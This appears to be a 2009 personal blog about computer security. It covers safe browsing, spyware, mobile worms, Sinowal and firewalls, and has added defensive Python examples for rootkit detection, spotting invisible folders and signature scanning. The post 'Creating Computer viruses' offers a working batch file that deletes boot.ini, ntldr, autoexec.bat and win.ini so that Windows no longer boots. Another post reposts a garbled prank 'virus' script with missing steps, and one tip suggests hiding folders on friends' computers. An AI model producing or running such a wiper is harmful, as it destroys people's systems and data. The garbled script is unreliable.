
Friday, August 14, 2009


Today we are familiar with the term cyber crime. Sometimes we may ourselves be a victim of cyber crime. Most cyber crimes are committed through the internet. The increasing number of cyber crimes has made it difficult to use the internet even for browsing. Some countries have banned sites related to pornography. Most servers maintain a blacklist containing the names of websites that may harm users who view them. Now let us look at how to use the internet safely.
Install a software firewall on your system. The firewall lets you know which applications access the internet and allows you to block applications from accessing it. See the figure below.


There may be a virus or trojan installed on your computer that accesses the internet without your knowledge. The firewall shows all the applications connected to the internet and allows you to block or terminate them.

As you know, the world's safest browser is Mozilla Firefox 3.5. It is also very fast. Hence it is recommended to use the Firefox browser. Firefox has an add-on named Web of Trust (WOT) which shows how safe the website you are visiting is. So I recommend you install this add-on. The screenshot is given below:



If you are visiting a site related to finance, it is better to use the private browsing option in Firefox. To enable private browsing go to the Tools menu -> Start Private Browsing. During private browsing, no data will be stored other than downloaded files and bookmarks.

Try to avoid storing user names and passwords in the browser. Also change your password periodically. This will give your account more security. Also don't forget to sign out or log out after viewing the website. Do not click on links whose content you are unsure about.

Try to avoid visiting porn sites and sites that provide serials or cracks for shareware. Download files from servers you trust. When searching for software, it is better to search on FileHippo or CNET or other such trusted sites.








Monday, July 27, 2009

RootkitRevealer

Now it's time to look into the software section. Let us see a small program called RootkitRevealer. The software doesn't need to be installed: just double-click the icon and agree to the terms and conditions, and the software is ready to use. It is designed to run on Windows NT or higher editions of Windows. RootkitRevealer is an advanced rootkit detection utility whose output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. RootkitRevealer is capable of detecting many persistent rootkits including AFX, Vanquish and HackerDefender. RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys. Since persistent rootkits work by changing API results so that a system view using APIs differs from the actual view in storage, RootkitRevealer compares the results of a system scan at the highest level with those at the lowest level. The highest level is the Windows API and the lowest level is the raw contents of a file system volume or Registry hive. A hive file is the Registry's on-disk storage format. Thus, rootkits, whether user mode or kernel mode, that manipulate the Windows API or native API to remove their presence from a directory listing, for example, will be seen by RootkitRevealer as a discrepancy between the information returned by the Windows API and that seen in the raw scan of a FAT or NTFS volume's file system structures. You can download it from http://filehippo.com/download_rootkit_revealer/tech/
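The cross-view comparison described above, as an added example that is not part of the original post and not Sysinternals' code: two constructed listings stand in for the Windows API view and the raw volume scan, and the function reports where they disagree.

```python
"""Cross-view discrepancy check in the spirit of RootkitRevealer.

Added example, not part of the original post and not Sysinternals' code.
It models the two views the post describes: a high-level listing (what
the Windows API reports) and a low-level listing (what a raw parse of
the volume's directory structures shows).  Both views here are
constructed sample data rather than real API calls or disk reads.
"""

from dataclasses import dataclass


@dataclass(frozen=True)
class Entry:
    path: str
    size: int


# Constructed sample: the API view is missing one file and misreports a size.
API_VIEW = [
    Entry(r"C:\Windows\System32\ntdll.dll", 1_300_000),
    Entry(r"C:\Windows\System32\drivers\etc\hosts", 824),
    Entry(r"C:\Temp\readme.txt", 120),
]
RAW_VIEW = [
    Entry(r"C:\Windows\System32\ntdll.dll", 1_300_000),
    Entry(r"C:\Windows\System32\drivers\etc\hosts", 824),
    Entry(r"C:\Temp\readme.txt", 128),
    Entry(r"C:\Windows\System32\drivers\hiddn.sys", 40_960),  # constructed name
]


def _key(path):
    # FAT and NTFS names are case-insensitive; normalise before comparing.
    return path.lower()


def cross_view_diff(api_view, raw_view):
    """Return sorted (path, reason) pairs where the two views disagree.

    A file present in the raw scan but absent from the API listing is the
    classic symptom of a rootkit filtering directory enumeration.  A file
    only in the API view, or a size mismatch, can also be a file that
    changed between the two scans, so each finding needs a second look.
    """
    api = {_key(e.path): e for e in api_view}
    raw = {_key(e.path): e for e in raw_view}
    findings = []
    for k, e in raw.items():
        if k not in api:
            findings.append((e.path, "Hidden from Windows API"))
        elif api[k].size != e.size:
            findings.append(
                (e.path, f"Size mismatch: API {api[k].size}, raw {e.size}")
            )
    for k, e in api.items():
        if k not in raw:
            findings.append((e.path, "Visible in Windows API but not in raw scan"))
    return sorted(findings)


if __name__ == "__main__":
    for path, reason in cross_view_diff(API_VIEW, RAW_VIEW):
        print(f"{path}\t{reason}")
```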








Saturday, July 25, 2009

How to create an invisible folder

You may have private details on your computer and you don't want your friends accessing them. There is software available in the market for protecting a folder with a password. In such cases you may get into trouble if the password is lost. There is also another way to hide folders from your friends. This is a common technique used to create invisible folders. The advantage of this method is that you need no software for it. Follow the steps given below:

1. Select the folder you want to make invisible.

2. Press F2, or right-click on the folder and choose Rename.

3. Press and hold the Alt key and enter 255 using the number pad (press the Num Lock key and enter 255 using the number pad on the right-hand side), then release the Alt key.

4. Press Enter. Now the folder appears to be a nameless folder.

5. Now what is the next step? Yes, that's it: making the icon invisible. For that, right-click on the folder and select Properties.

6. Select the Customize tab and click on the Change Icon button.

7. Now a new window containing several icons appears. Select an invisible (blank) icon from the window and then press the OK button in each of the two open windows. Now the invisible folder is ready.

You can use this to have fun with your friends by hiding folders on their computers.
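A check an administrator can run for folders hidden this way, added here and not part of the original post: it walks a directory tree and reports any folder whose name contains no visible character (the Alt+255 name is a single non-breaking space, U+00A0). The sample tree it scans is constructed inside a temporary directory.

```python
"""Find folders whose names consist only of blank or invisible characters.

Added example, not part of the original post.  Alt+255 gives the folder
a name made of a single non-breaking space (U+00A0, code 255 in the OEM
code page Windows uses for Alt codes), which Explorer renders as empty.
This walk flags any directory whose name has no visible glyph, whatever
blank or format characters were used, so an administrator can review it.
"""

import os
import tempfile
import unicodedata

# Unicode categories with no visible glyph: space separators (Zs), line and
# paragraph separators (Zl, Zp), controls (Cc) and format characters (Cf,
# e.g. the zero-width space U+200B).
_INVISIBLE_CATEGORIES = {"Zs", "Zl", "Zp", "Cc", "Cf"}


def is_invisible_name(name):
    """True if the name is non-empty and no character in it is visible."""
    return bool(name) and all(
        unicodedata.category(ch) in _INVISIBLE_CATEGORIES for ch in name
    )


def find_invisible_dirs(root):
    """Return the paths of directories under root with invisible-only names."""
    hits = []
    for dirpath, dirnames, _files in os.walk(root):
        for name in dirnames:
            if is_invisible_name(name):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def demo():
    """Build a constructed tree holding one Alt+255-style folder and one
    zero-width-space folder, scan it, and return the hits relative to root."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "Documents", "\u00a0"))  # Alt+255 name
        os.makedirs(os.path.join(root, "Documents", "Photos"))
        os.makedirs(os.path.join(root, "\u200b\u200b"))  # zero-width variant
        return [os.path.relpath(h, root) for h in find_invisible_dirs(root)]


if __name__ == "__main__":
    for hit in demo():
        print(repr(hit))
```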








Friday, July 24, 2009

Google trying to put an end to computer virus....

With the release of its Operating System, Google is trying to put an end to the computer virus. Its engineering experts are studying the flaws in existing Operating Systems and the measures to overcome their limitations. If Google's venture is realized, it would mark the beginning of a new era in the cyber world. It has been learnt that Linus Upson, Google's Engineering Director, has promised that the company is: "Completely redesigning the underlying security architecture of the OS so users don't have to deal with viruses, malware and security updates. It should just work." Google's dominance among its competitors increases the chance of success. Google's Open Source policy also supports this argument. But in the past, the release of the Operating System Windows NT threatened several antivirus firms, since there was a rumor that all the security flaws of the previous versions of Windows had been solved and no virus could harm a computer running Windows NT; the result went against the rumor. There are several challenges before Google. Security flaws have been reported in the Chrome web browser, and two of them have already been solved. We can expect an Operating System free from viruses and malware, free of cost.








Wednesday, July 22, 2009

Spyware (Part - 3)

Let us see what the media are through which spyware infects a computer. Spyware on a computer does not try to infect other computers like a virus, worm or trojan. It just collects the user's details and sends them to a particular person or firm via the internet. Spyware usually gets installed on the computer without the knowledge of the user. The spyware usually comes with a useful program. When the user installs the program without knowing that it contains spyware, the spyware gets installed on the computer and sends the details about the user stored on the computer. This is against privacy in using the internet. The manufacturer usually presents the spyware as useful software. The common categories of such software include themes, games, and internet utilities such as download accelerators, web boosters etc. Many Internet users were introduced to spyware in 1999, when a popular freeware game called "Elf Bowling" came bundled with tracking software. The cookie is a well-known mechanism for storing information about an internet user on their own computer. If a website stores information about you in a cookie that you don't know about, the cookie can be considered a form of spyware.
Another way of installing it is by using vulnerabilities in the security software provided to block this spyware. This is done by making the user click on a link disguised as a pop-up asking anything that makes the user click on it; that click triggers the installation of the spyware. In a few cases, a worm or virus has delivered a spyware payload. Some attackers used the Spybot worm to install spyware that put pornographic pop-ups on the infected system's screen. By directing traffic to ads set up to channel funds to the spyware authors, they profit personally.








Tuesday, July 21, 2009

Creating Computer viruses

In this post I will show how to create a more dangerous application. Activating it will delete the files required for booting and shut down the computer, which will then not boot on restart. So handle with care; otherwise it will end in a permanent crash. Please do not use this to harm others. I found it on Garena.com.

Open Notepad, type the following and save it as a "filename.bat" file.


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini







How to make a Virus for fun

While I was searching for the latest information about computer viruses on the internet, I came across a site that tells how to make a simple virus for fun. Its link is: http://ardiansyahputra.wordpress.com/2008/08/23/create-a-harmless-virus-in-notepad-cara-membuat-virus-jinak-di-notepad/

I have put it here for you. It can be edited according to your wishes. However, I didn't edit it, as it is his work. Please do not use this for any malpractice.

Step 1.
Open Notepad.
Step 2.
Type the following code in Notepad.
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BERSIAP-SIAP MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………! properties -> options -> full screen


Step 4 is not necessary, but it will magnify the effect.


Step 5.
Yes, that is the only step remaining: activate it by double-clicking on the icon.



To abort the virus so that your PC is not shut down: click START -> RUN and type the command shutdown -a before the remaining time is over.
Look at the fig. below.



Monday, July 20, 2009

Spyware (Part - 2)

Now let us look into a short history of spyware. I have searched several sites to get the history of spyware. Wikipedia provides good and clear information on the history of spyware. I have extracted some part of the history of spyware here just for you. The first known use of the word spyware was on October 16, 1995, and it was used against Microsoft's business model. Spyware was first considered hardware meant for espionage purposes. In early 2000, the founder of Zone Labs, Gregor Freund, used the term spyware during the release of the ZoneAlarm Firewall. Since then the term has been used in its present sense. As of 2006, spyware has become one of the prominent security threats to computers using Microsoft Windows operating systems. Computers on which Internet Explorer (IE) is the primary browser are particularly vulnerable to such attacks. This is not only because IE is the most widely used browser, but because its tight integration with Windows allows spyware access to crucial parts of the operating system.
Before Internet Explorer 7 was released, the browser would display a message saying that an ActiveX control must be installed to view a particular section of the website or the whole website. But in most cases the spyware was disguised as ActiveX. The combination of user naiveté towards malware and the assumption by Internet Explorer that all ActiveX components are benign led, in part, to the massive spread of spyware. Many spyware components would also make use of exploits in JavaScript, Internet Explorer and Windows to install without user knowledge or permission. After installation, Windows sometimes pops up warning messages about the presence of spyware on the computer.

The Windows Registry contains multiple sections where modifying key values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware will typically link itself from each location in the registry that allows execution. Once running, the spyware will periodically check whether any of these links have been removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted even if some (or most) of the registry links are removed.








How to keep your PC virus free

You may be wondering whether there is any way to keep the PC from virus infection. Here are some tips to keep the PC free from viruses.
For keeping the PC free from computer viruses and other malicious applications we mainly need three pieces of software:

1. Anti-virus
2. Anti Malware Software
3. Rootkit Remover

Now let us see why we have to use these programs. Let us take the case of the anti-virus. As you know, an anti-virus is used to find and destroy viruses. Knowing this, most computer users install an anti-virus. But many people using an anti-virus do not update it properly. This may put your PC in trouble. An anti-virus generally has two parts: 1. the virus signature database and 2. the anti-virus engine. Each virus has its own signature, just as a person has his own signature. The virus signature is nothing but a sequence of bytes (code) that the virus places in every file it infects. This sequence is unique to that particular virus. So by simply comparing the virus signature with the data of a file, it is easy to detect the presence of the virus. Since more and more viruses are released into cyberspace daily, the anti-virus firms discover the signatures of the new viruses and put them on the internet for users to download. When we update the anti-virus, these signatures are downloaded into the anti-virus's database, and the anti-virus gains the capability to detect the new viruses. The anti-virus engine compares the signatures in the virus signature database with the data of the files. If a match is found, the file is treated as infected, and measures are taken to prevent further infection, delete the virus and recover the original file. It also scans memory for the presence of viruses.
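The two-part design just described (signature database plus matching engine), as an added example that is not from the post or any real anti-virus product: it scans files for byte signatures, then shows a constructed sample going undetected until a definition update adds its signature. The only real signature is the harmless EICAR test string; the second signature and both sample files are constructed.

```python
"""A minimal signature scanner with the two parts the post describes:
a signature database and an engine that matches it against file data.

Added example, not part of the original post and not any real anti-virus
product.  The only real pattern used is the EICAR test string, which
anti-virus products detect by agreement and which is harmless; the
second signature and both sample files are constructed for the demo.
"""

import os
import tempfile

# Standard EICAR test string (harmless, detected by every AV engine).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


def scan_bytes(data, signatures):
    """Return the names of all signatures whose byte pattern occurs in data."""
    return sorted(name for name, pattern in signatures.items() if pattern in data)


def scan_file(path, signatures, chunk=1 << 20):
    """Scan a file chunk by chunk, keeping an overlap of len(longest
    signature) - 1 bytes so a pattern straddling a chunk boundary is found."""
    if not signatures:
        return []
    overlap = max(len(p) for p in signatures.values()) - 1
    hits, tail = set(), b""
    with open(path, "rb") as f:
        while True:
            block = f.read(chunk)
            if not block:
                break
            buf = tail + block
            hits.update(scan_bytes(buf, signatures))
            tail = buf[-overlap:] if overlap > 0 else b""
    return sorted(hits)


def update_database(signatures, new_entries):
    """Model of a definition update: merge newly published signatures."""
    merged = dict(signatures)
    merged.update(new_entries)
    return merged


def demo():
    """Show that a new sample is missed until its signature is added.

    Returns (results before update, results after update, small-chunk scan),
    each result being (hits on eicar.com, hits on tool.exe).
    """
    base_db = {"EICAR-Test-File": EICAR}
    # Constructed marker standing in for a new family's unique byte sequence.
    new_db = {"Constructed.Sample.A": b"\x90\x90\xebCONSTRUCTED-MARKER-A"}
    with tempfile.TemporaryDirectory() as d:
        eicar_path = os.path.join(d, "eicar.com")
        sample_path = os.path.join(d, "tool.exe")
        with open(eicar_path, "wb") as f:
            f.write(EICAR)
        with open(sample_path, "wb") as f:  # constructed, not a real executable
            f.write(b"MZ" + b"\x00" * 300 + new_db["Constructed.Sample.A"] + b"\x00" * 50)
        before = (scan_file(eicar_path, base_db), scan_file(sample_path, base_db))
        updated = update_database(base_db, new_db)
        after = (scan_file(eicar_path, updated), scan_file(sample_path, updated))
        # Tiny chunks force the EICAR string across many chunk boundaries.
        small = scan_file(eicar_path, updated, chunk=5)
    return before, after, small


if __name__ == "__main__":
    print(demo())
```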

The use of an anti-virus will not guarantee protection of the PC from all malicious software. For that purpose we have to use anti-malware software. Malwarebytes is one of the most common anti-malware programs used internationally. The anti-malware software scans the memory as well as the storage devices of the PC for malicious software. This software can effectively remove almost all the malicious software on the PC. But there are some malware applications that survive this anti-malware software. We can use rootkit remover software for removing that type of application. Rootkits are capable of killing and hiding different processes running in the Operating System. Some programs like Daemon Tools use rootkits but are not malicious software. RootkitRevealer is a rootkit remover tool used today.
These programs are not enough to keep your PC from all attacks if you have an internet connection. You must use a firewall to regulate internet usage by applications and to prevent unwanted packets from entering the PC. I prefer Sygate Firewall to the Windows firewall since it allows blocking unwanted applications from accessing the internet. But do not use more than one firewall on a PC, since each firewall works on its own set of rules and they may clash if more than one firewall is used.
Always use the Firefox 3.5 browser for more security. Add-ons should be downloaded only if they are marked as recommended. Do not install add-ons from third parties whom you do not trust.

Always download software from trusted sites like FileHippo, CNET, Brothersoft etc. Try to avoid downloading software from unfamiliar sites. I believe these tips will help you keep your PC clean.









Friday, June 26, 2009

Spyware (Part - 1)

Spyware is any technology or software that gathers the personal information of a person or the confidential information of an organization. Spyware is a malicious application that is installed on the computer with or without the knowledge of the user. Spyware, as its name suggests, performs the function of a spy. It collects various information from the computer and sends the information to the attacker. Some spyware allows the attacker to configure the victim's computer to his needs. The spyware may be installed on the computer without the knowledge of the user through a drive-by download or by clicking a link in a pop-up window. But there is spyware available in the market which helps parents track the sites visited by their children. As you may know, the browser stores information about the sites you visited in cookies. If personal information about you is stored in a cookie, then the cookie can be considered spyware. In the beginning, the function of spyware was just monitoring the user. But as time passed, more powerful spyware was introduced. Its functions are not limited to simply monitoring the user. It can not only collect the browsing habits of the user but can also install software that will interfere with the normal operation of the computer. You may sometimes have noticed that you cannot access the internet, yet data transfer occurs between your computer and the internet without your permission. That may be because of spyware. Some people ask on sites like Yahoo Answers, ibibo.com etc. about the problem of spyware redirecting websites. Even if they enter the correct website address, they are redirected to another site. This shows that the browser has been compromised by the installed spyware. As you may know, collecting any personal information without the knowledge of the user, by any means, is a crime.
Similarly, the creation and usage of spyware that collects personal information about other people or organizations is a crime. Many countries have made strict laws to prevent spyware. Yet there are people creating spyware, challenging the laws of their own nation.








Wednesday, June 24, 2009

Microsoft Malicious Tool For Computer Virus Removal

You may know that Microsoft releases patches for new computer viruses and the bugs they find. They also release some virus removal tools such as RootkitRevealer for Windows users. The arrival of these tools, as well as applications for keeping the computer away from attack by malicious programs, proves their concern about the security of computers running Windows. Microsoft is spending splendid resources, including time, for Windows users. They want Windows to be a secure Operating System. You may have noticed that the new Operating Systems that Microsoft releases have far better security than the older versions. Some releases even threatened the anti-virus software firms. But the virus makers found loopholes in the security measures and created viruses that exploit the loopholes to the maximum extent.
There are several programs available on Microsoft's website for computer security. Millions of people have downloaded and installed them. The people who do not download these programs may be unable to due to the lack of an internet connection, or unaware of them, or using a pirated version of Windows and fearing that they would be caught if they connect to Microsoft's website. Don't worry about that; you can download it from other trusted websites like Brothersoft, CNET, FileHippo etc.
Microsoft has released a malicious software removal tool which is freeware and can be downloaded from the internet. The tool is meant for Windows Vista, XP, 2000 and Windows Server 2003. This Malicious Software Removal Tool can remove any malicious software that is running in the process tree. To run the application you have to download it, then install it on your computer. You can install the application only if you are accessing the computer with your administrator account. After installing the application you can run the software and perform the scan. It will remove all the malicious software running in the process tree. You can use it along with other anti-virus software.
The application to be downloaded is 8.4 MB in size. The file name is "windows-kb890830-v2.11.exe". You can download it from:







Crazy Boot Computer virus

Crazy Boot is a computer virus capable of infecting computers running Windows. It spreads through floppy disks. When a host computer is booted from a floppy disk infected by the Crazy Boot virus, the virus starts infecting the host computer. However, it does not cause any physical damage or direct loss of information. It is a boot virus: it infects a computer only when the computer is booted from an infected disk. When a computer is booted from an infected floppy, Crazy Boot infects the Master Boot Record. It reads the highest memory location from RAM and resides in that highest memory location. Once it gets into memory, it starts infecting files that are not write-protected.
The Crazy Boot virus is a stealth virus. If you try to examine the infected boot sector, it displays the correct boot sector information. It also displays the message:

DON'T PLAY WITH THE PC!
OTHERWISE YOU WILL GET IN 'DEEP, DEEP' TROUBLE!. . .
CRAZY BOOT VER. 1.0

There is a very low chance of a computer getting infected by the Crazy Boot virus today, since the era of the floppy disk is almost over and due to the security measures included in the versions of Windows available in the market today. It is very risky to disinfect the boot sector using FDISK /MBR. This is because the Crazy Boot virus does not place the original MBR in its correct location, but the location is known to the Crazy Boot virus. It is better to use a proper antivirus to remove the virus.





Tuesday, June 23, 2009

The Latest Computer-Virus Victim - Macromedia Shockwave

You may be familiar with .swf files. They are created using Macromedia Flash. They are used to create animations. I have also created some small Flash movies. The swf file contains the audio and video data for the animation. The file is so compact that it can be used in many web-based applications. Several websites, including those owned by multinational companies, use Flash animations to make their websites more attractive and interactive. One example is esnips.com; the site uses a Flash file to let the user upload files. You can also see an attractive animation with good user interaction on the website of the company Hero Honda. Moreover, Flash allows one to create small applications. Flash gives the user a lot of functions to create applications very easily and can accommodate complex functions. Applications created using Flash are more attractive than those created using Java or C++. The usage of Flash on a website is considered more secure than including video. But a recent report by the Kaspersky anti-virus firm proves this to be wrong. SWScript.LFM is the first malicious program that infects the popular multimedia format Macromedia Shockwave. For spreading, this malicious program requires several important conditions, whose simultaneous fulfilment is highly unlikely. First of all, LFM requires a PC on which a full program version that executes Macromedia Shockwave files has been installed; the special plug-in versions installed in Internet Explorer and Netscape Navigator by default are not enough for the virus to operate. Secondly, a user has to manually download the infected SWF file to his computer and start it up. Thirdly, fortunately, LFM is only capable of infecting SWF files located in the same directory as the file carrying the virus. Kaspersky Labs considers the possibility of an epidemic outbreak caused by the LFM virus to be very unlikely.
Maybe this starts a new era of computer viruses that can spread more than other viruses, since many websites use Flash-based applications.
Defense procedures against LFM have already been added to the Kaspersky Labs daily anti-virus database update as of January 8, 2002. More detailed information about this malicious program is available in the Kaspersky Virus Encyclopedia.

Sunday, June 21, 2009

Commwarrior Mobile Virus

Commwarrior is a mobile worm developed to infect mobiles running Symbian OS. It was first discovered in Russia. It uses Bluetooth and MMS as the media for spreading. Commwarrior.A checks the system clock and decides which application can be used for spreading. But Commwarrior does not use this method. The worm reads the mobile numbers from the address book of the infected mobile and sends out the virus files via Bluetooth and through MMS. Normally, if a virus starts spreading, users can be warned against the virus by the name of the infected file that the virus sends to other mobiles. Commwarrior cannot be prevented in this manner. It can give the infected files different names, as a parent names his child. Since the different infected files have different names, users cannot be warned against receiving the infected file. Usually multimedia files are sent through MMS. So users have the feeling that files received through MMS are more secure, since images and video have a minor probability of being a virus. But unfortunately Symbian installation files can also be sent through MMS. This feature (maybe a loophole) is used by the worm for infecting other mobiles. So be careful about the files you receive on your mobile. Always check whether the file was sent with the knowledge of the person from whose mobile you received it.

Spreading through Bluetooth

Commwarrior spreads through Bluetooth using SIS files that have different names. The SIS file contains the worm's main executable commwarrior.exe and the boot component commrec.mdl. The SIS file contains autostart settings that will automatically execute commwarrior.exe after the SIS file is installed.
When the Commwarrior worm is executed it will start looking for other Bluetooth-enabled devices. If a device is found, it sends a copy of itself to each of these phones one after another. If the target phone goes out of range or rejects the file transfer, Commwarrior will search for another phone. The Commwarrior worm will look for new targets after sending itself to the first target, so it is able to contact all phones in range.
Spreading through MMS

Commwarrior spreads through MMS by sending MMS messages that contain the infected SIS file to other users whose mobile numbers are in the address book of the infected mobile. The MMS messages contain variable text and the Commwarrior SIS file with the filename commw.sis. Unlike in Bluetooth spreading, the SIS file name is constant; otherwise the SIS file is identical to the one sent in Bluetooth spreading.




Disinfection

The easiest way of disinfection is the use of anti-virus software for the mobile phone, which will remove almost all the viruses on your mobile phone. Several companies like F-Secure provide software for the removal of mobile phone viruses. To download the software, open the browser on your mobile and navigate to http://mobile.f-secure.com. Click on the link "Download F-Secure Mobile Anti-Virus" and then select your phone model. Then download the file and install it. After installing, go to the menu, open the antivirus and scan the mobile phone for viruses. The software will detect the viruses and remove them. But to kill the running Commwarrior process, the mobile phone must be restarted. You will get a detailed description of manual removal from:
http://www.cell-phone-viruses.com/1124211683-commwarrior-virus-manual-removal.html

Friday, June 19, 2009

Duts Mobile Virus

After the invasion of Cabir, a new mobile virus called WinCE/Duts was discovered in July 2004. One of the interesting characteristics of the virus is that it first asks the user for permission to infect files. When an infected file is executed, the virus pops up a message box asking:
Dear User, am I allowed to spread?
When the user presses "Yes", the virus will infect all the EXE files in the current directory. Duts contains two messages that are not displayed:
This is proof of concept code. Also, i wanted to make avers happy.
The situation when Pocket PC antiviruses detect only EICAR file had to end ...
Duts is a 1520-byte program written in assembly language for the ARM processor. It affects devices running the Windows CE Operating System.

Wednesday, June 17, 2009

Skulls Mobile Virus

I have given a brief idea about the viruses affecting mobile phones. Skulls is one of the notorious trojans that affect mobile phones. Skulls is a SIS file trojan that affects phones running Symbian OS. The trojan replaces the applications installed on the phone with non-functional versions, so that the phone becomes almost useless.
Most people want to make the user interface of their mobile phones more attractive. For this purpose they install themes. Sometimes the installed theme file may be "Extended theme.SIS", which claims to be the theme manager for the Nokia 7610 smart phone. Then beware: you may have installed the Skulls virus. After Skulls gets control of your mobile, you will see all the icons of the applications in the menu replaced by the image of a skull. I have provided a screenshot below:

Fortunately Skulls still allows you to make and receive calls. But all other applications, including SMS and MMS, will be disabled by Skulls. If you find that your phone contains the Skulls virus, it is very important that you do not reboot your phone. Rebooting the phone will make it difficult to remove the Skulls virus. Skulls trojans are targeted at Symbian Series 60 devices, but they can also affect other Symbian devices, for example the Nokia 9500, which is a Series 80 device. However, when trying to install the Skulls trojan on a Nokia 9500, the user will get a warning that the SIS file is not intended for the device, so the risk of accidental infection is low.
For manual removal of Skulls from a compromised device, it is necessary to reinstall all overwritten applications. The SymbOS/Skulls SIS installer must then be deleted. If this does not restore the phone, formatting the phone may be necessary. All data saved on the C drive will be lost during a format.

Mobile Viruses

Mobile phones have become a part of our life. Now it is hard to imagine a day without them. As technology advanced, mobile phones became more and more sophisticated and user friendly and gained lots of functions. Mobile phones keep us always connected to our dear ones. Even though mobile phones create small radiation problems, people ignore this and fall victim to harmful diseases. Still, the number of people using mobile phones is increasing day by day. This puts the mobile phone manufacturers in tough competition, so the manufacturers develop new varieties of phones. Thus today's mobile phones can be called mobile computers, since they incorporate almost all the functions of a personal computer. Most of the costly mobile phones use advanced operating systems such as Symbian OS, which even allow the user to connect to the internet. The growth of mobile phone technology on the constructive side gives birth to its destructive side as well. Thus viruses for mobile phones and PDAs were born. Fortunately, mobile phones running operating systems made entirely for that specific series of phones are almost safe from virus attack. But Bluetooth-enabled mobiles are becoming victims of virus attacks.
A mobile virus is an electronic virus that infects mobile phones or wireless-enabled PDAs. The first case of a mobile virus was reported in June 2004, when it was discovered that a company called Ojam had engineered an anti-piracy Trojan into older versions of its mobile phone game Mosquito. This virus sent SMS text messages to the company without the user's knowledge. The virus was removed from more recent versions of the game; however, it still exists in older, unlicensed versions. These older versions may still be distributed on file-sharing networks and free software download web sites.
In July 2004, computer hobbyists released a proof-of-concept mobile virus named Cabir. Cabir, also known as EPOC.cabir and Symbian/Cabir, is designed to infect mobile phones running Symbian OS. When a phone is infected with Cabir, the message "Caribe" is shown on the phone's display every time the phone is turned on. The worm then attempts to spread to other phones in the area using Bluetooth. The worm was not released into the wild but sent directly to anti-virus firms, who believe Cabir in its current state is harmless. However, it does prove that mobile phones are also at risk from virus writers. Experts also believe that the worm was developed by a group of international hackers who call themselves 29A, as a "proof of concept" worm in order to catch world attention. It failed to infect any of its targets. The worm can attack and replicate on Bluetooth-enabled Series 60 phones. It tries to send itself to all Bluetooth-enabled devices that support the "Object Push Profile", which can also be non-Symbian phones, desktop computers or even printers. Symantec reports that the worm spreads as a .SIS file installed in the Apps directory. Unlike PC worms, Cabir does not spread if the user does not accept the file transfer or does not agree to the installation. F-Secure reports that at least some phones warn the user about an unverified supplier.[1] So, like many other worms, this sample also needs a good portion of social engineering to reach its goal. While the worm is considered harmless because it replicates but does not perform any other activity, it results in shortened battery life on portable devices due to constant scanning for other Bluetooth-enabled devices. Mabir, a variant of Cabir, is capable of spreading not only via Bluetooth but also via MMS. By sending out copies of itself as a .sis file over cellular networks, it can affect even users who are outside the 10 m range of Bluetooth.
In March 2005 it was reported that a computer worm called Commwarrior-A had been infecting Symbian Series 60 mobile phones. This worm replicates itself through the phone's Multimedia Messaging System (MMS). It sends copies of itself to the other phone owners listed in the user's address book. Although the worm is not considered harmful, experts agree that it heralds a new age of electronic attacks on mobile phones.
Other known mobile viruses are Duts, Skulls, Commwarrior, etc. The details of these viruses will be published later.
Blogged with the Flock Browser

Friday, June 12, 2009

Actifed Computer Virus

Actifed is a G2-generated encrypted computer virus. As usual, the virus is loaded into memory by executing an infected program; it then affects the running programs and corrupts program files. This virus infects .COM and .EXE files but does not infect command.com. G2 generates compact, easily modified, fully commented source code for .COM and .EXE infectors. It also supports the creation of resident and non-resident, encrypted and non-encrypted viruses. PS-MPC has a similar use.


Monday, June 1, 2009

Computer Virus Sinowal

Kaspersky reports that the virus threat increased during the month of April 2009. The new malware exploits security flaws in Adobe Acrobat Reader, the PDF software, or uses the Neosploit rootkit. According to the researchers, the detection and cure of rootkits is a very difficult problem faced by antivirus experts.
Kaspersky Research Lab detected a fresh version of Sinowal at the end of March 2009. Sinowal is malicious code that keeps itself hidden in an infected computer by infecting its Master Boot Record (MBR). Sinowal plants itself at the lowest level of the operating system: it infects the MBR and bypasses the antivirus software. E-mail was considered the main medium for spreading malware through the internet, but infection through websites increased 300% in 2008. Now the malware redirects search results and confuses the user. Kaspersky recommends its users to keep their antivirus up to date and scan for the malware. If any malware is found, the system will have to be restarted during treatment.

Saturday, May 30, 2009

Software Firewall

You may have heard the term firewall. If you have a network of computers (say 50 computers), you will implement a firewall to protect your network from cyber attacks. A firewall controls the ports that are used to communicate with the network. You can implement your own rules concerning the security of the network. You can allow FTP to a restricted number of computers. You can also prevent computers from visiting certain restricted sites. The larger the network, the tighter the security must be. But what about the case of one or two computers connected to the internet? The software firewall is the solution. The software firewall examines the ports connected to the internet and regulates them. It also asks the user whenever an application installed on the computer tries to access the internet. Thus we can prevent unwanted usage of the internet by unknown applications. This also saves our bandwidth. An unknown application using the internet connection is generally a trojan or spyware.
The usage of the software firewall is not limited to small networks. It is also used in huge networks to regulate the usage of the internet by employees.

The firewall uses the following methods to prevent unwanted data transfer through the internet.
  • Proxy Service: Information from the internet is received by the firewall and forwarded to the requesting system. It can also receive a request sent by a computer in the network and forward it to the corresponding destination.
  • Packet Filtering: The information to be sent is broken down into small units called packets. These packets are first received by the firewall and checked against a set of predefined filters. The firewall allows only the trusted packets to pass to the requesting computer.
  • Stateful Inspection: This is a newer method. It does not check the whole packet; instead it checks only certain parts of it. It records specific parts of the data while the request is sent out and compares them with the incoming packets. If a match is found the packet is considered trusted and allowed into the network; otherwise it is blocked.
